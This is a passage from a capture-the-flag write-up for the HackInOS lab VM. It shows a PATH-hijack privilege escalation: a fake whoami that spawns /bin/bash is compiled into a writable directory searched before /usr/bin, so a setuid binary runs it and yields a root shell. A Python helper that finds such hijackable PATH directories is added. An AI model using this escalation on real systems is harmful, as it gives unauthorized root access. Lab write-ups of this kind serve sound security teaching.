a.out sets its gid and uid to 0 and then runs whoami through system(), i.e. via /bin/sh with a PATH lookup rather than an absolute path. For setuid(0) to succeed the binary must be setuid root (check with ls -l a.out); given that, whoever controls which whoami the shell finds first gets a root shell. Because setuid(0) also sets the real uid, bash will not drop the privileges when it starts.
Write a replacement whoami.c (gcc is installed on the target):
    #include <stdlib.h>

    int main(void)
    {
        system("/bin/bash");
        return 0;
    }
Privilege escalation via whoami
Copy the file to the target with scp:
    hummingbirdscyber@vulnvm:/usr/bin$ scp -r root@192.168.222.134:/root/whoami.c /tmp/whoami.c
    root@192.168.222.134's password:
    whoami.c
Check the PATH:
    hummingbirdscyber@vulnvm:~$ echo $PATH
    /home/hummingbirdscyber/bin:/home/hummingbirdscyber/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
/home/hummingbirdscyber/bin is searched before /usr/bin, where the real whoami lives, and it is writable by us. system() inherits the calling shell's environment, so a whoami placed there is what /bin/sh resolves when a.out runs.
Compile the replacement into ~/bin and run a.out:
    hummingbirdscyber@vulnvm:/tmp$ mv whoami.c /home/hummingbirdscyber/bin/
    hummingbirdscyber@vulnvm:~/bin$ gcc whoami.c -o whoami
    hummingbirdscyber@vulnvm:~/bin$ ls
    whoami  whoami.c
    hummingbirdscyber@vulnvm:~/bin$ chmod +x whoami
    hummingbirdscyber@vulnvm:~/bin$ cd
    hummingbirdscyber@vulnvm:~$ cd Desktop/
    hummingbirdscyber@vulnvm:~/Desktop$ ./a.out
    root@vulnvm:~/Desktop# ls
    root@vulnvm:~/Desktop# cd /root
    root@vulnvm:/root# ls
    flag
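The following is an added example, not from the original writeup: given a PATH string and the command name a setuid program passes to system(), it works out which directory /bin/sh would resolve the command from and which earlier, writable directories would let a planted binary win the lookup. The filesystem probes are injectable; when run without arguments it evaluates a constructed view of the HackInOS host (PATH from the output above, the real whoami assumed at /usr/bin/whoami, the two home-directory entries assumed writable).

```python
"""Added example (not from the original writeup): find where a PATH lookup
lands and which writable directories earlier on PATH can shadow it."""
import os


def resolve_command(command: str, path_env: str, is_executable=None) -> str:
    """First PATH entry holding an executable named `command`, as /bin/sh
    would find it. An empty PATH entry means the current directory."""
    is_executable = is_executable or (lambda p: os.path.isfile(p) and os.access(p, os.X_OK))
    for entry in path_env.split(":"):
        candidate = os.path.join(entry or ".", command)
        if is_executable(candidate):
            return candidate
    return ""


def hijack_candidates(command: str, path_env: str, is_executable=None, is_writable=None) -> list:
    """Writable PATH directories that come *before* the real binary. A file
    named `command` dropped in any of them wins the lookup."""
    is_writable = is_writable or (lambda d: os.path.isdir(d) and os.access(d, os.W_OK))
    real = resolve_command(command, path_env, is_executable)
    winners = []
    for entry in path_env.split(":"):
        directory = entry or "."
        if real and os.path.join(directory, command) == real:
            break  # entries after the real binary never get consulted
        if is_writable(directory):
            winners.append(directory)
    return winners


# --- constructed view of the HackInOS host (assumptions, used by demo()) ---
TARGET_PATH = ("/home/hummingbirdscyber/bin:/home/hummingbirdscyber/.local/bin:"
               "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:"
               "/usr/games:/usr/local/games:/snap/bin")
FAKE_EXECUTABLES = {"/usr/bin/whoami"}
FAKE_WRITABLE_DIRS = {"/home/hummingbirdscyber/bin", "/home/hummingbirdscyber/.local/bin", "/tmp"}


def demo() -> dict:
    """Evaluate the writeup's situation: where whoami really is and where a fake one wins."""
    real = resolve_command("whoami", TARGET_PATH, FAKE_EXECUTABLES.__contains__)
    wins = hijack_candidates("whoami", TARGET_PATH,
                             FAKE_EXECUTABLES.__contains__, FAKE_WRITABLE_DIRS.__contains__)
    return {"real": real, "hijack_dirs": wins}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        # live mode: evaluate a command name against this shell's own PATH
        cmd = sys.argv[1]
        print({"real": resolve_command(cmd, os.environ.get("PATH", "")),
               "hijack_dirs": hijack_candidates(cmd, os.environ.get("PATH", ""))})
    else:
        print(demo())
```

Run on the target as `python3 hijack.py whoami` it answers the question the PATH inspection above answers by eye; the same logic flags the usual hardening gap, a PATH that puts user-writable directories ahead of system ones for a program that calls system() with a bare command name.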
    root@vulnvm:/root# cat flag
    Congratulations!
    (ASCII-art banner not reproduced)
Original article by 小嵘源码; if reproduced, please credit the source: https://www.lcpttec.com/hackinos/